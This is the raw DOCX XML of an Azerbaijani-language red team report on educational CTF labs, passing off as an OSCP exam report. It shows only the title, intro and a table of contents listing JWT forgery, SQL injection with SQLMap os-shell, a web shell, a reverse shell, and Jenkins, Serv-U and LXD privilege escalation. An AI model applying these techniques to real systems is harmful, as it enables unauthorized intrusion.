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Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:sz w:val="52"/>
        </w:rPr>
        <w:t>Red Team</w:t>
        <w:br/>
        <w:t>Hesabatı</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r/>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:before="3200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bu sənəd tədris məqsədli CTF tapşırıqları üzrə hazırlanmış texniki red team hesabatıdır.</w:t>
        <w:br/>
        <w:t>Hesabatda üç ayrı mühit üzrə aparılmış enumerasiya, istismar və privilege escalation addımları Azərbaycan dilində sənədləşdirilmişdir.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>Table of Contents</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1  OffSec Certified Professional Exam Report</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1.1  Giriş</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1.2  Məqsəd</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>1.3  Tələblər</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2  Yüksək səviyyəli xülasə</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>2.1  Tövsiyələr</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3  Metodologiya</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3.1  İnformasiya toplama</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3.2  Xidmət enumerasiyası</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3.3  İstismar</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3.4  Mövqenin saxlanması</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>3.5  Təmizləmə</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4  Independent Challenges</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1  CTF 1 - 192.168.100.129</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.1  İnformasiya toplama və ilkin analiz</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.2  JWT manipulyasiyası ilə admin panelinə keçid</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.3  SQL injection və verilənlər bazası çıxarışı</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.4  SQLMap os-shell və istifadəçi səviyyəsində dayaq nöqtəsi</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.5  Jenkins üzərindən git istifadəçisinə keçid</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>10</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.6  jenkins istifadəçisindən node istifadəçisinə keçid</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.1.7  Root escalation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>13</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2  CTF 2 - 192.168.20.129</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2.1  Host aşkarlanması və xidmət enumerasiyası</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>14</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2.2  Gizli məzmunun tapılması və web enumerasiyası</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2.3  shell.php üzərindən ilkin komanda icrası</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2.4  Reverse shell və lokal enumerasiya</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>19</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.2.5  Serv-U üzərindən privilege escalation və root</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>22</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3  CTF 4 - 192.168.31.232</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.1  GitLab səthinin ilkin analizi</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>25</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.2  İstifadəçi enumerasiyası və brute force</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>26</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.3  GitLab versiyasının təyini və arbitrary file read</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.4  plumber hesabına keçid və user bayrağı</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.5  LXD üzərindən root escalation</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:tabs>
          <w:tab w:pos="9241" w:val="right" w:leader="dot"/>
        </w:tabs>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>4.3.6  Alternativ eskalasiya yolu qeydi</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>29</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>OffSec Certified Professional Exam Report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Red Team Hesabatı</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Giriş</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Bu hesabat daxilində təqdim olunan bütün addımlar tədris məqsədli CTF laboratoriyalarında icra edilmişdir. Məqsəd müxtəlif hücum səthlərini sistemli şəkildə analiz etmək, ilkin giriş əldə etmək, istifadəçi səviyyəsində dayaq nöqtəsi yaratmaq və daha sonra privilege escalation yolu ilə ən yüksək səlahiyyətə çatmaq olmuşdur.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Məqsəd</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:line="276" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Qiymətləndirmənin məqsədi hər bir hədəfdə real pentest metodologiyasına uyğun olaraq informasiya toplamaq, servisləri enumerasiya etmək, zəiflikləri istismar etmək və nəticələri sübutlarla birlikdə hesabatlaşdırmaqdır.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="200" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:b/>
          <w:color w:val="163A63"/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>Tələblər</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Qeyri-texniki xülasə və ümumi risk mənzərəsi</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>• Addım-addım metodologiya və istifadə olunan alətlər</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
        <w:ind w:left="340"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri"/>
          <w:sz w:val="22"/>
        </w:rPr>
